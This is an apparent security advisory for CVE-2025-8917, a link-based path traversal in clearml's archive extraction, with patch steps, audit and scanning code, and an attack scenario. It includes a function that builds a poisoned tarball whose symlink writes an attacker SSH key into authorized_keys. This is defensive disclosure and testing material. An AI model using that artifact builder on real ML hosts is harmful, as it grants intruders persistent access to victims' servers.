CVE-2025-8917: clearml: path traversal in safe_extract → RCE risk
GHSA-579p-qf78-fqm2 | MEDIUM | PoC AVAILABLE | CISA SSVC: ATTEND

Upgrade clearml to 2.0.2 immediately — the `safe_extract` path traversal allows crafted artifacts (models, datasets) to overwrite arbitrary files on extraction, achieving RCE on any host that processes them. The real threat vector is not a direct attacker but a poisoned artifact in your shared experiment store triggering file writes during automated pipeline execution. EPSS is negligible and no active exploitation observed, but MLOps pipelines that auto-extract artifacts from external or shared sources should treat this as higher priority than the score indicates.
Risk Assessment
CVSS 5.8 understates real-world risk in collaborative MLOps environments. The local attack vector assumes single-machine exploitation, but clearml instances routinely auto-extract artifacts from shared repositories, effectively broadening the attack surface to anyone who can push artifacts to your clearml server. Post-exploitation Confidentiality and Integrity impact is High — filesystem overwrites can yield persistent access. Low EPSS (0.00027) and no KEV listing confirm no active exploitation, but the symlink/hardlink → path traversal → RCE chain is well-understood and reproducible by moderately skilled attackers.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| clearml | pip | < 2.0.2 | 2.0.2 |
Do you use clearml? Any version before 2.0.2 is affected.
Recommended Action
1. Patch: Run `pip install --upgrade clearml` to reach 2.0.2 across all environments (dev, CI/CD, training servers, inference hosts).
2. Audit: Run `pip show clearml` to confirm version; flag any < 2.0.2 as critical.
3. Artifact inspection: Review recently extracted archives for unexpected symlinks or files written outside extraction directories.
4. Detection: Alert on unusual file writes by clearml worker processes — especially targeting /etc/, ~/.ssh/, Python site-packages, or cron directories.
5. Hardening: Run clearml workers in containers with read-only host filesystem mounts and least-privilege service accounts.
6. Provenance controls: Enforce that workers only extract artifacts from authenticated, internal clearml servers — block external artifact sources at the network layer.
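Steps 1–2 can be automated fleet-wide. The sketch below is a stdlib-only Python check (no clearml API calls, just installed-package metadata) that flags a host running a vulnerable release; the `2.0.2` threshold comes from this advisory, and the parser assumes plain `X.Y.Z` release strings.

```python
"""Audit sketch: flag an environment running clearml < 2.0.2 (CVE-2025-8917)."""
from importlib.metadata import PackageNotFoundError, version
from typing import Optional, Tuple

PATCHED = (2, 0, 2)  # first fixed release, per the advisory

def parse_version(v: str) -> Tuple[int, ...]:
    """Parse a plain release string like '1.16.5' into a comparable tuple."""
    parts = []
    for piece in v.split(".")[:3]:
        digits = "".join(ch for ch in piece if ch.isdigit())
        parts.append(int(digits or 0))
    return tuple(parts)

def is_vulnerable(installed: Optional[str]) -> bool:
    """True if the given clearml version predates the 2.0.2 patch."""
    if installed is None:
        return False  # clearml not installed on this host
    return parse_version(installed) < PATCHED

def installed_clearml() -> Optional[str]:
    """Return the installed clearml version, or None if absent."""
    try:
        return version("clearml")
    except PackageNotFoundError:
        return None

if __name__ == "__main__":
    v = installed_clearml()
    if is_vulnerable(v):
        print(f"CRITICAL: clearml {v} < 2.0.2 -- upgrade now")
    else:
        print("OK: clearml absent or already patched")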
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Frequently Asked Questions
What is CVE-2025-8917?
CVE-2025-8917 is a path traversal vulnerability in clearml versions before 2.0.2: the `safe_extract` function mishandles symbolic and hard links, so a crafted artifact (model or dataset archive) can overwrite arbitrary files on extraction, potentially achieving RCE on any host that processes it. The real threat vector is not a direct attacker but a poisoned artifact in your shared experiment store triggering file writes during automated pipeline execution. Upgrade to clearml 2.0.2 immediately.
Is CVE-2025-8917 actively exploited?
No active exploitation of CVE-2025-8917 has been observed (low EPSS, no CISA KEV listing), but proof-of-concept exploit code is publicly available, which increases the risk of exploitation.
How to fix CVE-2025-8917?
1. Patch: Run `pip install --upgrade clearml` to reach 2.0.2 across all environments (dev, CI/CD, training servers, inference hosts).
2. Audit: Run `pip show clearml` to confirm version; flag any < 2.0.2 as critical.
3. Artifact inspection: Review recently extracted archives for unexpected symlinks or files written outside extraction directories.
4. Detection: Alert on unusual file writes by clearml worker processes — especially targeting /etc/, ~/.ssh/, Python site-packages, or cron directories.
5. Hardening: Run clearml workers in containers with read-only host filesystem mounts and least-privilege service accounts.
6. Provenance controls: Enforce that workers only extract artifacts from authenticated, internal clearml servers — block external artifact sources at the network layer.
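Step 3 above (artifact inspection) can be sketched with the standard library: walk an extraction directory and report any symlink whose resolved target escapes it. This is an illustrative triage helper, not clearml tooling; it catches symlinks only (hardlinks would need `st_nlink` inspection).

```python
"""Scan an extraction directory for symlinks escaping it."""
import os
from typing import List

def suspicious_entries(extract_dir: str) -> List[str]:
    """Return 'link -> target' strings for symlinks resolving outside extract_dir."""
    root = os.path.realpath(extract_dir)
    bad = []
    for dirpath, dirnames, filenames in os.walk(extract_dir):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                target = os.path.realpath(path)
                # flag links whose resolved target is not under the extraction root
                if os.path.commonpath([root, target]) != root:
                    bad.append(f"{path} -> {target}")
    return bad
```

Running it over recently extracted artifact directories gives a quick worklist of entries to investigate.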
What systems are affected by CVE-2025-8917?
This vulnerability affects the following AI/ML architecture patterns: training pipelines, ml ops tooling, model registry, experiment tracking.
What is the CVSS score for CVE-2025-8917?
CVE-2025-8917 has a CVSS v3.1 base score of 5.8 (MEDIUM). The EPSS exploitation probability is 0.03%.
Technical Details
NVD Description
A vulnerability in clearml versions before 2.0.2 allows for path traversal due to improper handling of symbolic and hard links in the `safe_extract` function. This flaw can lead to arbitrary file writes outside the intended directory, potentially resulting in remote code execution if critical files are overwritten.
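For contrast, the checks a hardened extractor needs are straightforward. The sketch below is illustrative, not clearml's actual patched code: it refuses sym/hard link members outright and verifies each member's resolved destination stays inside the target directory before extracting.

```python
"""Illustrative hardened tar extraction guarding against CVE-2025-8917-style abuse."""
import os
import tarfile

def extract_safely(archive: str, dest: str) -> None:
    """Extract a tar archive, rejecting link members and path escapes."""
    dest_root = os.path.realpath(dest)
    with tarfile.open(archive) as tar:
        for member in tar.getmembers():
            # Block the exact primitives this CVE abuses: symlinks and hardlinks
            if member.issym() or member.islnk():
                raise ValueError(f"link member refused: {member.name}")
            target = os.path.realpath(os.path.join(dest_root, member.name))
            if os.path.commonpath([dest_root, target]) != dest_root:
                raise ValueError(f"path escapes destination: {member.name}")
        tar.extractall(dest)
```

On recent Python releases, `tarfile`'s built-in extraction filters (e.g. `tar.extractall(dest, filter="data")`) provide similar protections out of the box.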
Exploitation Scenario
Adversary targets a data science team using shared clearml experiment tracking. They compromise a clearml artifact store (or publish a poisoned pre-trained model to a public registry the team imports). The malicious artifact is a tarball embedding a symlink: `./model.pt → /home/mlworker/.ssh/authorized_keys`. When a clearml worker automatically downloads and extracts this artifact during a scheduled training run, `safe_extract` follows the symlink — writing an adversary-controlled SSH public key to the host. Adversary gains persistent SSH access to the training server and from there can pivot to the broader ML infrastructure, exfiltrate proprietary models, or inject poisoned weights into downstream pipelines.
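The poisoned artifact in this scenario can be reconstructed in a sandbox to test scanners. The sketch below (illustrative paths, placeholder key material) builds a tarball whose `model.pt` is a symlink to an `authorized_keys` path, followed by a same-named regular member that a link-following extractor would write through the link; listing members is enough to expose the plant.

```python
"""Sandbox reconstruction of the poisoned-artifact scenario (illustrative paths)."""
import io
import tarfile
from typing import List

def build_poisoned_artifact() -> bytes:
    """Build a tar.gz embedding a symlink escape, as a scanner test fixture."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        # member 1: symlink pointing outside any extraction directory
        link = tarfile.TarInfo("model.pt")
        link.type = tarfile.SYMTYPE
        link.linkname = "/home/mlworker/.ssh/authorized_keys"
        tar.addfile(link)
        # member 2: same name; a link-following extractor writes this payload
        # through the symlink, landing it in authorized_keys
        payload = b"ssh-ed25519 AAAA... attacker@evil\n"
        member = tarfile.TarInfo("model.pt")
        member.size = len(payload)
        tar.addfile(member, io.BytesIO(payload))
    return buf.getvalue()

def planted_links(blob: bytes) -> List[str]:
    """Return names of sym/hard link members -- what an artifact scanner should flag."""
    with tarfile.open(fileobj=io.BytesIO(blob)) as tar:
        return [m.name for m in tar.getmembers() if m.issym() or m.islnk()]
```

Because the link is visible in the member list without extracting anything, pre-extraction scanning is a cheap mitigation even before patching.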
Weaknesses (CWE)
CVSS Vector
CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N

References
Timeline
Related Vulnerabilities
- CVE-2025-59528 (CVSS 10.0): Flowise: Unauthenticated RCE via MCP config injection. Same attack type: Supply Chain.
- CVE-2024-2912 (CVSS 10.0): BentoML: RCE via insecure deserialization. Same attack type: Supply Chain.
- CVE-2023-3765 (CVSS 10.0): MLflow: path traversal allows arbitrary file read. Same attack type: Supply Chain.
- CVE-2025-5120 (CVSS 10.0): smolagents: sandbox escape enables unauthenticated RCE. Same attack type: Supply Chain.
- CVE-2026-21858 (CVSS 10.0): n8n: Input Validation flaw enables exploitation. Same attack type: Code Execution.